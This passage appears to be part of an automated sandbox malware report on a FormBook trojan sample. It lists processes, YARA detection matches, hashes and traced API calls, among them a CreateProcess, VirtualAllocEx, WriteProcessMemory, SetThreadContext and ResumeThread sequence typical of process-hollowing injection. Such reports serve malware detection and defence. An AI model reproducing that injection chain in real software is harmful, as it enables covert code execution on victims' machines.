                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:11
                                                      Start time:11:44:02
                                                      Start date:03/07/2024
                                                      Path:C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe"
                                                      Imagebase:0x830000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:12
                                                      Start time:11:44:15
                                                      Start date:03/07/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff6bf500000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:13.2%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:13%
                                                        Total number of Nodes:322
                                                        Total number of Limit Nodes:32

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !Y3E$Tefq$Tefq$$fq$$fq$$fq$$fq
                                                        • API String ID: 0-1827599424
                                                        • Opcode ID: af5bfa1108f6a19d32b6e00d0c32996ba00e0bb5212e46ddb7209ed1b9809006
                                                        • Instruction ID: 5c4f333326819426d1f2e9e33578bb181b367ce7167affbd8cdb2723050d01be
                                                        • Opcode Fuzzy Hash: af5bfa1108f6a19d32b6e00d0c32996ba00e0bb5212e46ddb7209ed1b9809006
                                                        • Instruction Fuzzy Hash: F4A18E74B102058FCB48AF79C995B6E7AB3BB88700F25842AE916EB3D4DF74DC018B51

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Tefq$Tefq$$fq$$fq
                                                        • API String ID: 0-235189018
                                                        • Opcode ID: 42ae7093cc753eaa277514084a74cb1dedaed5c301654c6e3b08782f7c0e544e
                                                        • Instruction ID: a5cd0b0d61f461a57d71b775944d8b5bdbf16bc9f586dc62a9db8168df8738b5
                                                        • Opcode Fuzzy Hash: 42ae7093cc753eaa277514084a74cb1dedaed5c301654c6e3b08782f7c0e544e
                                                        • Instruction Fuzzy Hash: E6D1BF71B103058FCB45EB78C8956AEBBB2AF89700F15846AE516EB3D1DF30DC418B91

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $fq$$fq
                                                        • API String ID: 0-2537786760
                                                        • Opcode ID: 52ed16147c5c21a4d347b2e010bacc15238f3a6202489d0ae2a8287b5dbee686
                                                        • Instruction ID: 50a479c05972e3758361e6ef362d315a627e8b77ddde2fcf5fec83c0da2771f2

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 012DD4B6
                                                        • GetCurrentThread.KERNEL32 ref: 012DD4F3
                                                        • GetCurrentProcess.KERNEL32 ref: 012DD530
                                                        • GetCurrentThreadId.KERNEL32 ref: 012DD589
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 012DD4B6
                                                        • GetCurrentThread.KERNEL32 ref: 012DD4F3
                                                        • GetCurrentProcess.KERNEL32 ref: 012DD530
                                                        • GetCurrentThreadId.KERNEL32 ref: 012DD589
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02C224FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02C224FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 012DAFFE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: cba5da1481ab77632a58b42d60f996e38ce42e7ad4db11f708831ed8f0bf8267
                                                        • Instruction ID: d9ae3ff286a2a29238bb36202e1fcff9567298dd7c6bf61b73437f020b5dbf34
                                                        • Opcode Fuzzy Hash: cba5da1481ab77632a58b42d60f996e38ce42e7ad4db11f708831ed8f0bf8267
                                                        • Instruction Fuzzy Hash: E78168B0A10B068FDB24DF29D441BAABBF1FF88304F00892ED58AD7A51D775E945CB91

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 012D59C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: c2f6f054024f11ad7bdd4d69c1668c729d79eed8729af5946b412764052d9312
                                                        • Instruction ID: 7e04707da6bf8c2ad50c98d43f05951e94a6d09ab1908ff8079ed7cf703674a1
                                                        • Opcode Fuzzy Hash: c2f6f054024f11ad7bdd4d69c1668c729d79eed8729af5946b412764052d9312
                                                        • Instruction Fuzzy Hash: 5F41D0B1C10719CFDB24CFA9C984B9EBBF5BF49304F20806AD448AB251DBB56946CF91
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 012D59C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: a37f879ef98f854ed41c04ad86e0b2a182061bb64ae202c188761390e027464e
                                                        • Instruction ID: fba838c60b2f603f884b2ff9bc61ac0994a8d0e88de5fbb76dbc3340fa9ef330
                                                        • Opcode Fuzzy Hash: a37f879ef98f854ed41c04ad86e0b2a182061bb64ae202c188761390e027464e
                                                        • Instruction Fuzzy Hash: 2141D1B0C10719CFDB24CFA9C985B9EBBB5BF89304F20806AD408AB251DBB56945CF91
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02C220D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 17829dce04fbf57b6ea21ec4dc3d9b23c3c0033ef638f0f450ffb633fd9a4177
                                                        • Instruction ID: 86b6380d1c1f23cade73e51dcca8efffcc7aaed950f865bb42f51b56e9ce0729
                                                        • Opcode Fuzzy Hash: 17829dce04fbf57b6ea21ec4dc3d9b23c3c0033ef638f0f450ffb633fd9a4177
                                                        • Instruction Fuzzy Hash: 073169B6D002098FCB10CFA9C8817DEBBF1FF88320F14842AE959A7255CB799945DB91
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02C216B6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: ab126ec8f4df530cc766b8a1d799467cc37bfdd3e42afdffc7d2c15f124b7d88
                                                        • Instruction ID: d2be2acde11993aad0868f8dd2d65d4cbd2b5ab8ff85af13365cf3f0ad22b4a7
                                                        • Opcode Fuzzy Hash: ab126ec8f4df530cc766b8a1d799467cc37bfdd3e42afdffc7d2c15f124b7d88
                                                        • Instruction Fuzzy Hash: 22317CB1D002098FDB10DFA9C4857EEFBF5EF88324F28842AD459A7241CB799945CF90
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02C221B0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 5a21199bf67f49e0d0cf62d9f530991448d0fdb802393345124e5706f611dae7
                                                        • Instruction ID: ac1a6ddf2bde64b3305dad059425608cfe7d62b8f5ce688397d9b13a34573624
                                                        • Opcode Fuzzy Hash: 5a21199bf67f49e0d0cf62d9f530991448d0fdb802393345124e5706f611dae7
                                                        • Instruction Fuzzy Hash: 19316FB6D002198FDB10CFA9C841AEEFBF5FF88320F10842AE559A7241CB749945DF61
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02C220D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 0625f8c065853e839ea12cec837aad64f2b7ed85522f482f8847b643d3771f03
                                                        • Instruction ID: 39b611ad15bfab0ad257bc82161cdc617e4cc1d49a24cac0fce79ccdd1958802
                                                        • Opcode Fuzzy Hash: 0625f8c065853e839ea12cec837aad64f2b7ed85522f482f8847b643d3771f03
                                                        • Instruction Fuzzy Hash: F62139B59003199FCB10CFA9C981BDEBBF5FF48324F10842AE919A7241C7799944DBA1
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02C21FEE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: d1ff7f49293075928fefdd6b7b65f8b983541016e717e22f0674b8b86d06a009
                                                        • Instruction ID: 62a1b565c67f286a3b26851be220412abad047126d67cdddf56454ca0f377bac
                                                        • Opcode Fuzzy Hash: d1ff7f49293075928fefdd6b7b65f8b983541016e717e22f0674b8b86d06a009
                                                        • Instruction Fuzzy Hash: 93219AB1900389DFCB21CFA9C841ADEBFF1EF48364F24840AD559A7251CB799505CFA1
                                                        APIs
                                                        • ResumeThread.KERNELBASE(?), ref: 02C215EA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 4fb97214a56dbab191f784675fc2b4a684f4561acce3c68a8db4ee5f423fe180
                                                        • Instruction ID: 9f50e34841bf903e0df65e8b395326c7413c0cd023462a11785ba48aa81bc35f
                                                        • Opcode Fuzzy Hash: 4fb97214a56dbab191f784675fc2b4a684f4561acce3c68a8db4ee5f423fe180
                                                        • Instruction Fuzzy Hash: 952159B1D002498FCB20CFA9C8457EEFBF5EF88324F24845AD419A7251CB759945DF91
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 02C250AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 08ed56b38d6a8bab8ef1ac09d12971311b6993be1609e5b745a63074fdf3708f
                                                        • Instruction ID: 53900383722c76216aee2c0ccb0d110b8dfe0d3a48578cae302784bba1797b79
                                                        • Opcode Fuzzy Hash: 08ed56b38d6a8bab8ef1ac09d12971311b6993be1609e5b745a63074fdf3708f
                                                        • Instruction Fuzzy Hash: 382128B68003498FCB20DF99D985BDEFBF4EB58324F24845AD559A7201C379A548CFA1
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02C221B0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 72905f9c1c75dcca84be4693678387a80017e21aedd3ec218b7133f5608314bd
                                                        • Instruction ID: d2c77c5d2066818a9575c9c6713648a2b11e4a9aea8bfd7edaeef69103238e48
                                                        • Opcode Fuzzy Hash: 72905f9c1c75dcca84be4693678387a80017e21aedd3ec218b7133f5608314bd
                                                        • Instruction Fuzzy Hash: 092139B1D003599FCB10DFAAC981ADEFBF5FF48320F10842AE919A7250C7799944DBA1
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02C216B6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 028325b9e1fbc7ac8706a7803ae39cad8bce13fde7ac3f58e21580eee47e60b2
                                                        • Instruction ID: 38a76a51c24cb737350764212583cd7edabc269a3df21e9a711bfd228af593f6
                                                        • Opcode Fuzzy Hash: 028325b9e1fbc7ac8706a7803ae39cad8bce13fde7ac3f58e21580eee47e60b2
                                                        • Instruction Fuzzy Hash: 612138B1D003098FDB10DFAAC5857AEBBF5EF88324F14842AD419A7241CB789A44CFA1
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012DD707
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: ac8f2baa84ecbbc8cd0710c421618c854799415a49c1a49b4425f27a31d7be43
                                                        • Instruction ID: 6a42675310730cce552d6c39c5b11e4a1a0bac1d8c8b9505cdaf5196e193d456
                                                        • Opcode Fuzzy Hash: ac8f2baa84ecbbc8cd0710c421618c854799415a49c1a49b4425f27a31d7be43
                                                        • Instruction Fuzzy Hash: 2E21E0B5D102499FDB10CFAAD985ADEBBF5EB48320F24841AE918A7350D378A940DF61
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012DD707
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 8c42eb141d30478930246e7ed2b86c1de26d4066aa5f4ca8cd47b2cb83bfcab5
                                                        • Instruction ID: 5a7a3ba801c96579530ca2a73a82c17f3bb88d81551750e28b6187ba12bc3601
                                                        • Opcode Fuzzy Hash: 8c42eb141d30478930246e7ed2b86c1de26d4066aa5f4ca8cd47b2cb83bfcab5
                                                        • Instruction Fuzzy Hash: 9121E4B5D002499FDB10CF9AD984ADEBFF8EB48320F24801AE914A7350D378A940DF61
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012DB079,00000800,00000000,00000000), ref: 012DB28A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: fb9c4c435327257b403982309cacab590544df0ae4d4ac2e8b34cd4ef87bbab9
                                                        • Instruction ID: 52be28445cdc4dde1e81839839a9e88172408ec6398996a7f8845f964b1c2cce
                                                        • Opcode Fuzzy Hash: fb9c4c435327257b403982309cacab590544df0ae4d4ac2e8b34cd4ef87bbab9
                                                        • Instruction Fuzzy Hash: 831103B68002498FDB10CF9AC448B9EFBF4EB89310F14842AE519A7200C375A944CFA5
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012DB079,00000800,00000000,00000000), ref: 012DB28A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 4020993275e4a9937e4faac605b03f19dec90034f94229b49240986889400096
                                                        • Instruction ID: 27a07318c25231e03bb56d184ba938475e32ce4a08c1708870e0e6c24f149ea5
                                                        • Opcode Fuzzy Hash: 4020993275e4a9937e4faac605b03f19dec90034f94229b49240986889400096
                                                        • Instruction Fuzzy Hash: D71112BA8042499FDB14CFAAC444ADEFFF4AB89320F14842ED559A7310C379A945CFA5
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02C21FEE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: ef70796d06a2ad45ffbb055b423778596bb065c38dfdf8f8ce83d50964a414d9
                                                        • Instruction ID: babfdd1cc6258ad2b2797b8af016b923ca7524d711049fda9b62fffd08fd093d
                                                        • Opcode Fuzzy Hash: ef70796d06a2ad45ffbb055b423778596bb065c38dfdf8f8ce83d50964a414d9
                                                        • Instruction Fuzzy Hash: 721167B19002498FCB20DFAAC845BDFBFF5EF88324F248419E519A7250CB75A900DFA1
                                                        APIs
                                                        • ResumeThread.KERNELBASE(?), ref: 02C215EA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 615780b88b8f38c5cd4a12f19cee943b9078ffef816e59e1f1584965a86a9c6c
                                                        • Instruction ID: c54d4a1b3931074ba9efcda8bdf86d896c01611b5daee9a6857b2b269c10f51c
                                                        • Opcode Fuzzy Hash: 615780b88b8f38c5cd4a12f19cee943b9078ffef816e59e1f1584965a86a9c6c
                                                        • Instruction Fuzzy Hash: 9F113AB1D003498FDB20DFAAC54579EFBF9EF88324F248419D519A7240CB79A944CFA5
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 012DAFFE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 5b9abfe9688d24a1a8a8964fdef75831e389c31ce1fdea1d38931590d4d4d327
                                                        • Instruction ID: 1fcd27abfbd1dde08cec8dd03c02c7ea8a307ba2bdc53a841d472d35b912e65b
                                                        • Opcode Fuzzy Hash: 5b9abfe9688d24a1a8a8964fdef75831e389c31ce1fdea1d38931590d4d4d327
                                                        • Instruction Fuzzy Hash: F411DFB5C002498FDB24CF9AC544B9EFBF4EB88324F24845AD529A7610D379A545CFA1
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 02C250AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 16b95bd655a3d42a73924d460eb5a73e8081f97aad01fc8ffbc62b0d917e6732
                                                        • Instruction ID: 979ab71da1b53ce679157fa29eaed2e5c9605d5fdb07db5145535a7f04291120
                                                        • Opcode Fuzzy Hash: 16b95bd655a3d42a73924d460eb5a73e8081f97aad01fc8ffbc62b0d917e6732
                                                        • Instruction Fuzzy Hash: 9211F2B5800349DFDB20DF9AC985BDEBBF8EB48324F20845AE519A7240C375A944CFE5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hjq
                                                        • API String ID: 0-3368716452
                                                        • Opcode ID: 082763a2fcf690491a8cc48460b9d857f2b099f8647bd9a55abd8f3d5f1e6546
                                                        • Instruction ID: b5c3e7d2bc01c4a12387fe7a322d80c52ce7cb43eb488af915785e3702f59cf2
                                                        • Opcode Fuzzy Hash: 082763a2fcf690491a8cc48460b9d857f2b099f8647bd9a55abd8f3d5f1e6546
                                                        • Instruction Fuzzy Hash: AB915D75A002499FCB05DFA8D9809EEBBF6FF89700B14806AE815EB351E735DD06CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Tefq
                                                        • API String ID: 0-1066582953
                                                        • Opcode ID: 814e6f86b65ad83b75873ae47f9432b6af71abeca2d5836c51ffdbe268aa033d
                                                        • Instruction ID: 74c2bb25d9bb5ccbb51a157dd89bd26e13de99cbfdf3453523871af966622484
                                                        • Opcode Fuzzy Hash: 814e6f86b65ad83b75873ae47f9432b6af71abeca2d5836c51ffdbe268aa033d
                                                        • Instruction Fuzzy Hash: 5351A171B002068FCB15EF7998488BFBBB6EFC8324715856AE429DB391DF309D058B91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq
                                                        • API String ID: 0-2007657732
                                                        • Opcode ID: cc46183428328335f51f6a24b5ba5b29d82d59609d10f4aa089f8858c2a04011
                                                        • Instruction ID: e3e16daeb30420489d68e8efdf4c5cb65a37a82396aec455d8c3c7f8963b38ba
                                                        • Opcode Fuzzy Hash: cc46183428328335f51f6a24b5ba5b29d82d59609d10f4aa089f8858c2a04011
                                                        • Instruction Fuzzy Hash: EF219D357102258BD714AB69D840ABFB7EAFFC8B00F10812AD90897391EAB59C068791
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
